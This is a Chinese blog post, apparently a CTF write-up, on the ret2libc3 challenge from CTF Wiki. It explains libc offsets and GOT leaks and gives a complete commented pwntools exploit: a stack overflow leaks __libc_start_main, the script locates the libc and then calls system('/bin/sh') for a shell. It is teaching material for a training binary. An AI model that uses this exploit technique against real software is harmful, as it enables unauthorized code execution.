Wiki-ret2libc3

最新推荐文章于 2024-05-13 09:42:57 发布
最新推荐文章于 2024-05-13 09:42:57 发布
阅读量531 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30204577/article/details/104998468
版权

0x 00 前言

因为libc3里面没有自带的system函数,我的水平又比较低,之前的kali里面没有更新libc-database,导致以为是自己的kali系统的问题,所以一直就没有学这方面的内容,这次更新了ubuntu中的libc-database,从而使得这方面的题目可以正常运行了,所以就来学习了,我觉得正常的比赛中也是不常有带有system函数的,故打算写出来以加深印象。这周再学习一个方面的CTF,然后就打算把课程里的东西阶段性地复习一下,,组成原理对于我这个不擅长算的人实在是太难了.....

0x10 ida查看

在ida中并没有发现有system函数的影子,也没有发现bin字符串。这就需要用到libc里面的东西了。

0x20 libc解释

libc里面的函数有很多,system函数就属于libc,我甚至在libc里面发现了快排函数....

0x 21 libc特点:
  • libc.so 动态链接库中的函数之间相对偏移是固定的。 也就是说有: A真实地址-A的偏移地址 = B真实地址-B的偏移地址 = 基地址
  • 即使程序有 ASLR 保护,也只是针对于地址中间位进行随机,最低的12位并不会发生改变。

所以如果我们知道 libc 中某个函数的地址,那么我们就可以确定该程序利用的 libc。进而我们就可以知道 system函数的地址。

那么如何得到 libc 中的某个函数的地址呢?我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容。当然,由于 libc 的延迟绑定机制,我们需要泄漏已经执行过的函数的地址。

所谓延迟绑定,就是说,在使用某一个函数的第一次时才会进行绑定( 符号查找、重定位等) ,这样以来,用不到的函数就不会进行绑定便会减少程序的加载时间。

而这个题目中,我们可以从下图中看到,已经执行过的函数有puts,则我们便可以泄漏(获取)puts函数在got表中的位置

如果我们已经知道了libc的版本,那么我们也可以使用dump命令得到libc里面的主要信息,如system和str_bin_sh。

0x30 exp分析

#!/usr/bin/env python
from pwn import *
from LibcSearcher import LibcSearcher
sh = process('./ret2libc3')#load local file

ret2libc3 = ELF('./ret2libc3')#加载ELF文件以查询一些函数地址

puts_plt = ret2libc3.plt['puts']#puts的地址
libc_start_main_got = ret2libc3.got['__libc_start_main']#puts函数的参数
main = ret2libc3.symbols['main']#puts函数的返回地址,以便第二次执行payload

print "leak libc_start_main_got addr and return to main again"
payload = flat(['A' * 112, puts_plt, main, libc_start_main_got])#这一段的意思就是先填充112个数据至栈,然后到达返回地址,此时返回地址为puts函数的地址,main为puts函数执行完毕后的返回地址,_main是参数,也就是说,这一次payload执行时:先输出_main的地址,然后再次返回至main处以便下一次执行payload
sh.sendlineafter('Can you find it !?', payload)#发送payload的同时执行了puts函数,并输出了_main的相对地址。

print "get the related addr"
libc_start_main_addr = u32(sh.recv()[0:4])#因低三位是不变化的,那么我们便可以使用一个变量来接受低三位。
libc = LibcSearcher('__libc_start_main', libc_start_main_addr)#使用LibcSearcher来在libc-database中查找对应的libc,这里的第一个参数应该与第二个参数的低三位所对应的函数相匹配。
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
#  基地址        main的真实地址               main的偏移地址
system_addr = libcbase + libc.dump('system')#查找system在libc里的真实地址
binsh_addr = libcbase + libc.dump('str_bin_sh')#查找binsh的地址

print "get shell"
payload = flat(['A' * 104, system_addr, 0xdeadbeef, binsh_addr])#继续填充栈,然后将返回地址改为system函数,system的参数为bin,0xdeadbeef为一个无效返回地址(因为返回到哪里已经无所谓了。)
sh.sendline(payload)

sh.interactive()

TedLau.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn-ret2libc基础
admin的博客
10-04 842
题源:基本 ROP - CTF Wiki (ctf-wiki.org)ret2libc的例三 这题的特点是:没有system,没有bin/sh。但是有puts,和gets函数。碰到gets函数基本上又是栈溢出大类中的题目。 ①先检查保护 ②:计算system和bin/sh的实际地址。 核心公式就是:函数真实地址=基地址+偏移量 那么我们如何得到 system 函数的地址呢?这里就主要利用了两个知识点 ①system 函数属于 libc,而 libc.so 动态链接...
pwn ——ret2libc3
qq_41696518的博客
07-06 815
ret2libc3
探索动态链接器宝藏:libc-database
最新发布
gitblog_00085的博客
05-13 445
探索动态链接器宝藏:libc-database 项目地址:https://gitcode.com/niklasb/libc-database 在这个安全与技术并重的时代,针对C语言的库函数攻击已不再陌生。其中,动态链接器glibc尤其受到关注。现在,我们向您介绍一个强大的开源项目——libc-database,它提供了一个Web界面和API,帮助开发者轻松管理和查找各种版本的glibc中的符号偏移...
ret2libc类型题目思考-ret2libc1
qq_30528603的博客
05-29 187
一眼看到栈溢出,ret2libc这类型的题目就是要利用栈溢出将控制流转移到glibc库的函数中。这里我们一定是找的plt表而不是system字符串的地址,这是要分清楚的。关于plt表和got表参考我的其他博客,这个玩意我也理解了很久比较愚钝。但是我在IDA看到距离ebp是0x64h,就算换算成10进制在加4也是104,当时我就觉得很疑惑。打算复现CTFwiki中的三个ret2libc类型的实现。当函数要返回的时候,他将跳到system函数的地址去执行,此时他将把ebp+4的内容当做函数的第一个参数传递。
ret2libc类型题目思考-ret2libc2
qq_30528603的博客
06-03 227
解析一下这样的布局,因为是栈溢出,所以我们要在溢出点做手脚填充112个字节的a来覆盖到返回地址,如何计算的填充数据的大小在ret2libc1中有很详细的讲解,这里就不再赘述,接下来,我们需要想先调用gets函数来让把我们输入的字符放入buf2,那么我们就需要调用gets函数的同时,把buf2的地址当参数传给gets函数。那么又有人问,中间的pop ebx的作用又是什么呢,其实它的作用是为了堆栈平衡的,用来把用完的buf2给弹出堆栈,方便ret的时候能正确指向system函数。因此我们完整的利用链就完成了。
CTFWIKI-PWN-ret2libc
m0_64180167的博客
04-20 1066
一遍我们只能找到got表的泄露 我们要写入的话就要重新执行一下 所以等等通过把start的地址存入返回地址 让程序执行两次。puts函数的真实地址 和 通过LibcSearcher工具得到的偏移量 就可以计算出每个函数的基地址。这里有一个问题 为什么我们需要找到开始的地址 _start表示程序开始的地址。如果我们无法找到system的plt地址 那我们就无法调用system函数。不是地址不会变 是函数和puts真实地址的之间的链接是不会变的。所以我们只要使用puts函数的真实地址 求出他们之间的链接。
ROP-Ret2Libc概述和利用
fanghuapyk的博客
03-19 1490
ret2libc简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有system函数,但是没有"/bin/sh"字符串 程序中自身就没有system函数和"/bin/sh"字符串,但给
pwn基础之ctfwiki-栈溢出-基础ROP-ret2libc-3
qq_52658640的博客
04-23 1175
文章目录基础知识libc泄露原理利用方法ret2libc3挖掘漏洞利用漏洞利用脚本 基础知识 libc泄露 原理 当有一道题给了可执行文件文件,在ida分析中并不能找到system函数和binsh地址,这时我们就可以利用在栈溢出之前执行过的函数泄露libc的版本。因为libc函数相对于libc的基地址都是确定的,采用 got 表泄露,即输出某个函数对应的 got 表项的内容,所以就可以通过上述方法来获取libc函数中的system地址和字符binsh的地址。 system 函数属于 libc,而 libc
ctf wiki ret2libc2
weixin_55885866的博客
05-13 167
具体思路为 构造两段gadgets ,第一段用于将字符串”/bin/sh“ 存储到某个地址。再构造system取出。注:汇编语言需要和地址p32();需要先给某个地址输入”/bin/sh“
ret2libc
2301_79863983的博客
04-07 673
wiki中的libc的第三道例题为例,理解libc
如何将ida中的悬浮窗口恢复原位
TedLau的博客
04-08 5279
恢复原位置的方法为:
攻防世界_pwn_level2(萌新版)
TedLau的博客
02-24 2437
首发于鄙人博客:传送门 0x00 前言 32位,NX enabled 0x10 步骤 0x11 main函数 很明显我们需要去查看vulnerable函数。 0x12 vulnerable函数 在这里我们需要向题目中输入若干内容,又观察到buf的长度为0x88,那么我们便可以构造出0x88长度的无关数据,然后再输入4个长度的垃圾数据以覆盖ebp,然...
pwntools入门
TedLau的博客
02-05 1881
0x00 前言: pwntools是写exp的得力助手,是pwn题中不可缺少的一部分,学pwn的过程中,对于pwntools的理解是必不可少的,今日我学习了部分pwntools的知识,在此写到博客中,本着分享知识的目的,同时也是为了加深自己的印象。部分知识我也不会,百度上没有特别明确的解释,文章应该不误导读者,故在一些地方我会特别注明。 本文正文中的英文粗体为索要解释的内容,斜体为官方文...
Docker安装及若干问题解析
TedLau的博客
02-24 1086
首发于鄙人博客:传送门 按照i春秋的教程我从https://blog.csdn.net/qq_27818541/article/details/73647797这个博客获得了指导。 博客上已经注明了,下面两个方式任选其一,我这个呆子两种方法都试了。。,重要的文字就应该用其他颜色的笔标出来... 全部步骤用完之后,就发现了如下的问题: 然后无奈之下开启了重装,使用...
攻防世界 -pwn1
TedLau的博客
04-22 906
0x00 前言 首次做到跟canary绕过有关的知识,就准备写点东西记录下。 64位,保护几乎全开了。不慌,慌也没用。 0x10 分析 运行可以发现几个功能,就是说:1选项是保存你将要输入的内容,2就是打印你之前输入的内容,3就是退出。 0x11 ida分析 main函数 在main函数中发现了canary, canary的值在程序每一次运行都是会改...
攻防世界_pwn_getshell(萌新版)
TedLau的博客
02-24 840
首发于鄙人博客:传送门 0x00 前言 无需多言,看图 :) 0x11 步骤
bugku-pwn5(萌新版)
TedLau的博客
05-02 740
补充一些点便于理解
攻防世界_pwn_hello_pwn(萌新版)
TedLau的博客
02-24 561
首发于鄙人博客:传送门 0x00 前言 file checksec已省略。64位elf程序 0x10 步骤 0x11 main函数 在main函数中我们可以看到,它让我们输入unk_601068的值,而如果我们想getshell,那么我们便需要将dword_60106c的值赋为1853186401。 0x11 bss段观察 可以看到这两个数据的距离并不远,所以...
攻防世界_pwn_CGfsb(萌新版)-pwnme解惑
TedLau的博客
02-24 517
首发于鄙人博客:传送门 0x00 前言 格式化字符串漏洞。 file checksec结果如下所示: NX打开,就是说堆栈不可执行。 PIE未打开,也就是说,我们在ida中国所看到的就是函数地址在运行过程中的地址。 0x10 步骤 0x11 main函数 在main函数中,我们可以发现printf函数的用法与我们平时使用C语言的习惯不同,这样的用法会给系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值